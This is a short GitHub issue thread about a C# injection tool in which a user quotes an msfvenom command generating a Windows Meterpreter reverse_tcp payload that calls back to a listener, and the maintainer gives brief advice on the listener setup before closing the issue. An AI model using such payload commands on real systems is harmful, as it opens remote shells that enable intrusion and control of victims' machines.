### ISSUE TITLE
Dont work with msf payload

### ISSUE THREAD

**Issue by sash322** [djhohnstein/CSharpSetThreadContext#1]
Tool dont work for me. Maybe i generate wrong payload in msfvenom. Can you please specify msf command to create .bin payload. In my case it is
 msfvenom -p windows/x64/meterpreter/reverse_tcp -f csharp -o msf.bin LHOST=1.1.1.1 LPORT=555

**Comment by djhohnstein** [comment]
Ensure your listener has started and that your LHOST is set to the IP address of the machine running Metasploit.

In general though, this code is provided "as is" and this is not a project I plan on supporting. I've added a disclaimer and am closing this issue.
